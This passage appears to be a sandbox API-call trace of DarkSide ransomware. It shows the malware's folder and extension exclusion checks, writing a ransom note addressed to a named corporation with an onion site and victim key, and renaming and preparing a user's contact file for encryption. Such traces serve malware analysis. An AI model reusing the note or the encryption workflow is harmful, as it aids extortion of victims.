0x10 [0155.448] _wcsicmp (_Str1="boot", _Str2="Contacts") returned -1 [0155.448] wcslen (_String="boot") returned 0x4 [0155.448] _wcsicmp (_Str1="google", _Str2="Contacts") returned 4 [0155.448] wcslen (_String="google") returned 0x6 [0155.448] _wcsicmp (_Str1="mozilla", _Str2="Contacts") returned 10 [0155.448] wcslen (_String="mozilla") returned 0x7 [0155.448] _wcsicmp (_Str1="program files", _Str2="Contacts") returned 13 [0155.448] wcslen (_String="program files") returned 0xd [0155.448] _wcsicmp (_Str1="program files (x86)", _Str2="Contacts") returned 13 [0155.448] wcslen (_String="program files (x86)") returned 0x13 [0155.449] _wcsicmp (_Str1="programdata", _Str2="Contacts") returned 13 [0155.449] wcslen (_String="programdata") returned 0xb [0155.449] _wcsicmp (_Str1="system volume information", _Str2="Contacts") returned 16 [0155.449] wcslen (_String="system volume information") returned 0x19 [0155.449] _wcsicmp (_Str1="tor browser", _Str2="Contacts") returned 17 [0155.449] wcslen (_String="tor browser") returned 0xb [0155.449] _wcsicmp (_Str1="windows.old", _Str2="Contacts") returned 20 [0155.449] wcslen (_String="windows.old") returned 0xb [0155.449] _wcsicmp (_Str1="intel", _Str2="Contacts") returned 6 [0155.449] wcslen (_String="intel") returned 0x5 [0155.449] _wcsicmp (_Str1="msocache", _Str2="Contacts") returned 10 [0155.449] wcslen (_String="msocache") returned 0x8 [0155.449] _wcsicmp (_Str1="perflogs", _Str2="Contacts") returned 13 [0155.449] wcslen (_String="perflogs") returned 0x8 [0155.449] _wcsicmp (_Str1="x64dbg", _Str2="Contacts") returned 21 [0155.449] wcslen (_String="x64dbg") returned 0x6 [0155.449] _wcsicmp (_Str1="public", _Str2="Contacts") returned 13 [0155.449] wcslen (_String="public") returned 0x6 [0155.449] _wcsicmp (_Str1="all users", _Str2="Contacts") returned -2 [0155.449] wcslen (_String="all users") returned 0x9 [0155.449] _wcsicmp (_Str1="default", _Str2="Contacts") returned 1 [0155.449] wcslen (_String="default") returned 0x7 [0155.449] wcscpy (in: _Dest=0x1d1000, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0155.449] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0155.449] wcscpy (in: _Dest=0x1d1044, _Source="Contacts" | out: _Dest="Contacts") returned="Contacts" [0155.449] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1f8e18 [0155.450] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0155.451] wcscpy (in: _Dest=0x1f8e18, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0155.451] GetNamedSecurityInfoW () returned 0x0 [0155.452] SetEntriesInAclW () returned 0x0 [0155.452] SetNamedSecurityInfoW () returned 0x0 [0155.457] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x132728) returned 1 [0155.457] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32eb6c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0155.457] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 1 [0155.457] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0155.457] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0155.458] WriteFile (in: hFile=0x1c, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32eb3c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32eb3c*=0x7ca, lpOverlapped=0x0) returned 1 [0155.459] CloseHandle (hObject=0x1c) returned 1 [0155.459] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0155.459] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 0x11 [0155.460] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="" [0155.460] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 0x2b [0155.460] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", fInfoLevelId=0x0, lpFindFileData=0x32ed9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ed9c) returned 0x132728 [0155.460] FindNextFileW (in: hFindFile=0x132728, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8a5b88c0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8a5b88c0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.460] FindNextFileW (in: hFindFile=0x132728, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0155.460] _wcsicmp (_Str1="Aclviho ASldjfl.contact", _Str2="README.c06622a1.TXT") returned -17 [0155.460] wcsstr (_Str="Aclviho ASldjfl.contact", _SubStr="README") returned 0x0 [0155.461] _wcsicmp (_Str1="autorun.inf", _Str2="Aclviho ASldjfl.contact") returned 18 [0155.461] wcslen (_String="autorun.inf") returned 0xb [0155.461] _wcsicmp (_Str1="boot.ini", _Str2="Aclviho ASldjfl.contact") returned 1 [0155.461] wcslen (_String="boot.ini") returned 0x8 [0155.461] _wcsicmp (_Str1="bootfont.bin", _Str2="Aclviho ASldjfl.contact") returned 1 [0155.461] wcslen (_String="bootfont.bin") returned 0xc [0155.461] _wcsicmp (_Str1="bootsect.bak", _Str2="Aclviho ASldjfl.contact") returned 1 [0155.461] wcslen (_String="bootsect.bak") returned 0xc [0155.461] _wcsicmp (_Str1="desktop.ini", _Str2="Aclviho ASldjfl.contact") returned 3 [0155.461] wcslen (_String="desktop.ini") returned 0xb [0155.461] _wcsicmp (_Str1="iconcache.db", _Str2="Aclviho ASldjfl.contact") returned 8 [0155.461] wcslen (_String="iconcache.db") returned 0xc [0155.461] _wcsicmp (_Str1="ntldr", _Str2="Aclviho ASldjfl.contact") returned 13 [0155.461] wcslen (_String="ntldr") returned 0x5 [0155.461] _wcsicmp (_Str1="ntuser.dat", _Str2="Aclviho ASldjfl.contact") returned 13 [0155.461] wcslen (_String="ntuser.dat") returned 0xa [0155.461] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Aclviho ASldjfl.contact") returned 13 [0155.461] wcslen (_String="ntuser.dat.log") returned 0xe [0155.461] _wcsicmp (_Str1="ntuser.ini", _Str2="Aclviho ASldjfl.contact") returned 13 [0155.461] wcslen (_String="ntuser.ini") returned 0xa [0155.461] _wcsicmp (_Str1="thumbs.db", _Str2="Aclviho ASldjfl.contact") returned 19 [0155.461] wcslen (_String="thumbs.db") returned 0x9 [0155.461] _wcsicmp (_Str1="386", _Str2="contact") returned -48 [0155.461] wcslen (_String="386") returned 0x3 [0155.461] _wcsicmp (_Str1="adv", _Str2="contact") returned -2 [0155.461] wcslen (_String="adv") returned 0x3 [0155.461] _wcsicmp (_Str1="ani", _Str2="contact") returned -2 [0155.461] wcslen (_String="ani") returned 0x3 [0155.462] _wcsicmp (_Str1="bat", _Str2="contact") returned -1 [0155.462] wcslen (_String="bat") returned 0x3 [0155.462] _wcsicmp (_Str1="bin", _Str2="contact") returned -1 [0155.462] wcslen (_String="bin") returned 0x3 [0155.462] _wcsicmp (_Str1="cab", _Str2="contact") returned -14 [0155.462] wcslen (_String="cab") returned 0x3 [0155.462] _wcsicmp (_Str1="cmd", _Str2="contact") returned -2 [0155.462] wcslen (_String="cmd") returned 0x3 [0155.462] _wcsicmp (_Str1="com", _Str2="contact") returned -1 [0155.462] wcslen (_String="com") returned 0x3 [0155.462] _wcsicmp (_Str1="cpl", _Str2="contact") returned 1 [0155.462] wcslen (_String="cpl") returned 0x3 [0155.462] _wcsicmp (_Str1="cur", _Str2="contact") returned 6 [0155.462] wcslen (_String="cur") returned 0x3 [0155.462] _wcsicmp (_Str1="deskthemepack", _Str2="contact") returned 1 [0155.462] wcslen (_String="deskthemepack") returned 0xd [0155.462] _wcsicmp (_Str1="diagcab", _Str2="contact") returned 1 [0155.462] wcslen (_String="diagcab") returned 0x7 [0155.462] _wcsicmp (_Str1="diagcfg", _Str2="contact") returned 1 [0155.462] wcslen (_String="diagcfg") returned 0x7 [0155.462] _wcsicmp (_Str1="diagpkg", _Str2="contact") returned 1 [0155.462] wcslen (_String="diagpkg") returned 0x7 [0155.462] _wcsicmp (_Str1="dll", _Str2="contact") returned 1 [0155.462] wcslen (_String="dll") returned 0x3 [0155.462] _wcsicmp (_Str1="drv", _Str2="contact") returned 1 [0155.462] wcslen (_String="drv") returned 0x3 [0155.462] _wcsicmp (_Str1="exe", _Str2="contact") returned 2 [0155.462] wcslen (_String="exe") returned 0x3 [0155.463] _wcsicmp (_Str1="hlp", _Str2="contact") returned 5 [0155.463] wcslen (_String="hlp") returned 0x3 [0155.463] _wcsicmp (_Str1="icl", _Str2="contact") returned 6 [0155.463] wcslen (_String="icl") returned 0x3 [0155.463] _wcsicmp (_Str1="icns", _Str2="contact") returned 6 [0155.463] wcslen (_String="icns") returned 0x4 [0155.463] _wcsicmp (_Str1="ico", _Str2="contact") returned 6 [0155.463] wcslen (_String="ico") returned 0x3 [0155.463] _wcsicmp (_Str1="ics", _Str2="contact") returned 6 [0155.463] wcslen (_String="ics") returned 0x3 [0155.463] _wcsicmp (_Str1="idx", _Str2="contact") returned 6 [0155.463] wcslen (_String="idx") returned 0x3 [0155.463] _wcsicmp (_Str1="ldf", _Str2="contact") returned 9 [0155.463] wcslen (_String="ldf") returned 0x3 [0155.463] _wcsicmp (_Str1="lnk", _Str2="contact") returned 9 [0155.463] wcslen (_String="lnk") returned 0x3 [0155.463] _wcsicmp (_Str1="mod", _Str2="contact") returned 10 [0155.463] wcslen (_String="mod") returned 0x3 [0155.463] _wcsicmp (_Str1="mpa", _Str2="contact") returned 10 [0155.463] wcslen (_String="mpa") returned 0x3 [0155.463] _wcsicmp (_Str1="msc", _Str2="contact") returned 10 [0155.463] wcslen (_String="msc") returned 0x3 [0155.463] _wcsicmp (_Str1="msp", _Str2="contact") returned 10 [0155.463] wcslen (_String="msp") returned 0x3 [0155.463] _wcsicmp (_Str1="msstyles", _Str2="contact") returned 10 [0155.463] wcslen (_String="msstyles") returned 0x8 [0155.463] _wcsicmp (_Str1="msu", _Str2="contact") returned 10 [0155.463] wcslen (_String="msu") returned 0x3 [0155.463] _wcsicmp (_Str1="nls", _Str2="contact") returned 11 [0155.464] wcslen (_String="nls") returned 0x3 [0155.464] _wcsicmp (_Str1="nomedia", _Str2="contact") returned 11 [0155.464] wcslen (_String="nomedia") returned 0x7 [0155.464] _wcsicmp (_Str1="ocx", _Str2="contact") returned 12 [0155.464] wcslen (_String="ocx") returned 0x3 [0155.464] _wcsicmp (_Str1="prf", _Str2="contact") returned 13 [0155.464] wcslen (_String="prf") returned 0x3 [0155.464] _wcsicmp (_Str1="ps1", _Str2="contact") returned 13 [0155.464] wcslen (_String="ps1") returned 0x3 [0155.464] _wcsicmp (_Str1="rom", _Str2="contact") returned 15 [0155.464] wcslen (_String="rom") returned 0x3 [0155.464] _wcsicmp (_Str1="rtp", _Str2="contact") returned 15 [0155.464] wcslen (_String="rtp") returned 0x3 [0155.464] _wcsicmp (_Str1="scr", _Str2="contact") returned 16 [0155.464] wcslen (_String="scr") returned 0x3 [0155.464] _wcsicmp (_Str1="shs", _Str2="contact") returned 16 [0155.464] wcslen (_String="shs") returned 0x3 [0155.464] _wcsicmp (_Str1="spl", _Str2="contact") returned 16 [0155.464] wcslen (_String="spl") returned 0x3 [0155.464] _wcsicmp (_Str1="sys", _Str2="contact") returned 16 [0155.464] wcslen (_String="sys") returned 0x3 [0155.464] _wcsicmp (_Str1="theme", _Str2="contact") returned 17 [0155.464] wcslen (_String="theme") returned 0x5 [0155.464] _wcsicmp (_Str1="themepack", _Str2="contact") returned 17 [0155.464] wcslen (_String="themepack") returned 0x9 [0155.464] _wcsicmp (_Str1="wpx", _Str2="contact") returned 20 [0155.464] wcslen (_String="wpx") returned 0x3 [0155.464] _wcsicmp (_Str1="lock", _Str2="contact") returned 9 [0155.465] wcslen (_String="lock") returned 0x4 [0155.465] _wcsicmp (_Str1="key", _Str2="contact") returned 8 [0155.465] wcslen (_String="key") returned 0x3 [0155.465] _wcsicmp (_Str1="hta", _Str2="contact") returned 5 [0155.465] wcslen (_String="hta") returned 0x3 [0155.465] _wcsicmp (_Str1="msi", _Str2="contact") returned 10 [0155.465] wcslen (_String="msi") returned 0x3 [0155.465] _wcsicmp (_Str1="pdb", _Str2="contact") returned 13 [0155.465] wcslen (_String="pdb") returned 0x3 [0155.465] _wcsicmp (_Str1="sqlite", _Str2="contact") returned 16 [0155.465] wcslen (_String="sqlite") returned 0x6 [0155.465] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 0x11 [0155.465] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0155.466] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0155.466] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 0x2a [0155.466] wcscpy (in: _Dest=0x321009e, _Source="Aclviho ASldjfl.contact" | out: _Dest="Aclviho ASldjfl.contact") returned="Aclviho ASldjfl.contact" [0155.466] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", dwFileAttributes=0x80) returned 1 [0155.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.466] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.466] ReadFile (in: hFile=0x1a8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.470] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xed331db2 [0155.470] RtlComputeCrc32 (PartialCrc=0x1db2, Buffer=0x32ec24, Length=0x80) returned 0x456fdf9f [0155.470] RtlComputeCrc32 (PartialCrc=0xdf9f, Buffer=0x32ec24, Length=0x80) returned 0xb26acd2f [0155.470] RtlComputeCrc32 (PartialCrc=0xcd2f, Buffer=0x32ec24, Length=0x80) returned 0x7cfc0177 [0155.470] RtlComputeCrc32 (PartialCrc=0x177, Buffer=0x32ec24, Length=0x80) returned 0x2893b407 [0155.470] CloseHandle (hObject=0x1a8) returned 1 [0155.470] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0155.471] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" [0155.471] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 0x42 [0155.471] wcscpy (in: _Dest=0x32200d4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.471] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.c06622a1"), dwFlags=0x8) returned 1 [0155.480] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0155.480] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0155.480] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0155.485] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x577616d0 [0155.485] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x173afd41 [0155.485] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x34a2a0aa [0155.485] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7b241b29 [0155.485] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6c17f7d3 [0155.485] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x58c25188 [0155.485] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x31a0a310 [0155.485] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3eb59c95 [0155.489] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0xbf99e5 [0155.489] RtlComputeCrc32 (PartialCrc=0x99e5, Buffer=0x710094, Length=0x80) returned 0xf5311b00 [0155.489] RtlComputeCrc32 (PartialCrc=0x1b00, Buffer=0x710094, Length=0x80) returned 0x6e5d4067 [0155.489] RtlComputeCrc32 (PartialCrc=0x4067, Buffer=0x710094, Length=0x80) returned 0x5f232b1a [0155.489] RtlComputeCrc32 (PartialCrc=0x2b1a, Buffer=0x710094, Length=0x80) returned 0xf5c5d5bc [0155.489] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0155.490] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0155.490] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0155.490] FindNextFileW (in: hFindFile=0x132728, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0155.490] _wcsicmp (_Str1="Administrator.contact", _Str2="README.c06622a1.TXT") returned -17 [0155.490] wcsstr (_Str="Administrator.contact", _SubStr="README") returned 0x0 [0155.490] _wcsicmp (_Str1="autorun.inf", _Str2="Administrator.contact") returned 17 [0155.490] wcslen (_String="autorun.inf") returned 0xb [0155.490] _wcsicmp (_Str1="boot.ini", _Str2="Administrator.contact") returned 1 [0155.490] wcslen (_String="boot.ini") returned 0x8 [0155.490] _wcsicmp (_Str1="bootfont.bin", _Str2="Administrator.contact") returned 1 [0155.490] wcslen (_String="bootfont.bin") returned 0xc [0155.490] _wcsicmp (_Str1="bootsect.bak", _Str2="Administrator.contact") returned 1 [0155.490] wcslen (_String="bootsect.bak") returned 0xc [0155.490] _wcsicmp (_Str1="desktop.ini", _Str2="Administrator.contact") returned 3 [0155.490] wcslen (_String="desktop.ini") returned 0xb [0155.490] _wcsicmp (_Str1="iconcache.db", _Str2="Administrator.contact") returned 8 [0155.490] wcslen (_String="iconcache.db") returned 0xc [0155.490] _wcsicmp (_Str1="ntldr", _Str2="Administrator.contact") returned 13 [0155.490] wcslen (_String="ntldr") returned 0x5 [0155.490] _wcsicmp (_Str1="ntuser.dat", _Str2="Administrator.contact") returned 13 [0155.490] wcslen (_String="ntuser.dat") returned 0xa [0155.490] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Administrator.contact") returned 13 [0155.490] wcslen (_String="ntuser.dat.log") returned 0xe [0155.490] _wcsicmp (_Str1="ntuser.ini", _Str2="Administrator.contact") returned 13 [0155.491] wcslen (_String="ntuser.ini") returned 0xa [0155.491] _wcsicmp (_Str1="thumbs.db", _Str2="Administrator.contact") returned 19 [0155.491] wcslen (_String="thumbs.db") returned 0x9 [0155.491] _wcsicmp (_Str1="386", _Str2="contact") returned -48 [0155.491] wcslen (_String="386") returned 0x3 [0155.491] _wcsicmp (_Str1="adv", _Str2="contact") returned -2 [0155.491] wcslen (_String="adv") returned 0x3 [0155.491] _wcsicmp (_Str1="ani", _Str2="contact") returned -2 [0155.491] wcslen (_String="ani") returned 0x3 [0155.491] _wcsicmp (_Str1="bat", _Str2="contact") returned -1 [0155.491] wcslen (_String="bat") returned 0x3 [0155.491] _wcsicmp (_Str1="bin", _Str2="contact") returned -1 [0155.491] wcslen (_String="bin") returned 0x3 [0155.491] _wcsicmp (_Str1="cab", _Str2="contact") returned -14 [0155.491] wcslen (_String="cab") returned 0x3 [0155.491] _wcsicmp (_Str1="cmd", _Str2="contact") returned -2 [0155.491] wcslen (_String="cmd") returned 0x3 [0155.491] _wcsicmp (_Str1="com", _Str2="contact") returned -1 [0155.491] wcslen (_String="com") returned 0x3 [0155.491] _wcsicmp (_Str1="cpl", _Str2="contact") returned 1 [0155.491] wcslen (_String="cpl") returned 0x3 [0155.491] _wcsicmp (_Str1="cur", _Str2="contact") returned 6 [0155.491] wcslen (_String="cur") returned 0x3 [0155.491] _wcsicmp (_Str1="deskthemepack", _Str2="contact") returned 1 [0155.491] wcslen (_String="deskthemepack") returned 0xd [0155.491] _wcsicmp (_Str1="diagcab", _Str2="contact") returned 1 [0155.491] wcslen (_String="diagcab") returned 0x7 [0155.491] _wcsicmp (_Str1="diagcfg", _Str2="contact") returned 1 [0155.492] wcslen (_String="diagcfg") returned 0x7 [0155.492] _wcsicmp (_Str1="diagpkg", _Str2="contact") returned 1 [0155.492] wcslen (_String="diagpkg") returned 0x7 [0155.492] _wcsicmp (_Str1="dll", _Str2="contact") returned 1 [0155.492] wcslen (_String="dll") returned 0x3 [0155.492] _wcsicmp (_Str1="drv", _Str2="contact") returned 1 [0155.492] wcslen (_String="drv") returned 0x3 [0155.492] _wcsicmp (_Str1="exe", _Str2="contact") returned 2 [0155.492] wcslen (_String="exe") returned 0x3 [0155.492] _wcsicmp (_Str1="hlp", _Str2="contact") returned 5 [0155.492] wcslen (_String="hlp") returned 0x3 [0155.492] _wcsicmp (_Str1="icl", _Str2="contact") returned 6 [0155.492] wcslen (_String="icl") returned 0x3 [0155.492] _wcsicmp (_Str1="icns", _Str2="contact") returned 6 [0155.492] wcslen (_String="icns") returned 0x4 [0155.492] _wcsicmp (_Str1="ico", _Str2="contact") returned 6 [0155.492] wcslen (_String="ico") returned 0x3 [0155.492] _wcsicmp (_Str1="ics", _Str2="contact") returned 6 [0155.492] wcslen (_String="ics") returned 0x3 [0155.492] _wcsicmp (_Str1="idx", _Str2="contact") returned 6 [0155.492] wcslen (_String="idx") returned 0x3 [0155.492] _wcsicmp (_Str1="ldf", _Str2="contact") returned 9 [0155.492] wcslen (_String="ldf") returned 0x3 [0155.492] _wcsicmp (_Str1="lnk", _Str2="contact") returned 9 [0155.492] wcslen (_String="lnk") returned 0x3 [0155.492] _wcsicmp (_Str1="mod", _Str2="contact") returned 10 [0155.492] wcslen (_String="mod") returned 0x3 [0155.492] _wcsicmp (_Str1="mpa", _Str2="contact") returned 10 [0155.493] wcslen (_String="mpa") returned 0x3 [0155.493] _wcsicmp (_Str1="msc", _Str2="contact") returned 10 [0155.493] wcslen (_String="msc") returned 0x3 [0155.493] _wcsicmp (_Str1="msp", _Str2="contact") returned 10 [0155.493] wcslen (_String="msp") returned 0x3 [0155.493] _wcsicmp (_Str1="msstyles", _Str2="contact") returned 10 [0155.493] wcslen (_String="msstyles") returned 0x8 [0155.493] _wcsicmp (_Str1="msu", _Str2="contact") returned 10 [0155.493] wcslen (_String="msu") returned 0x3 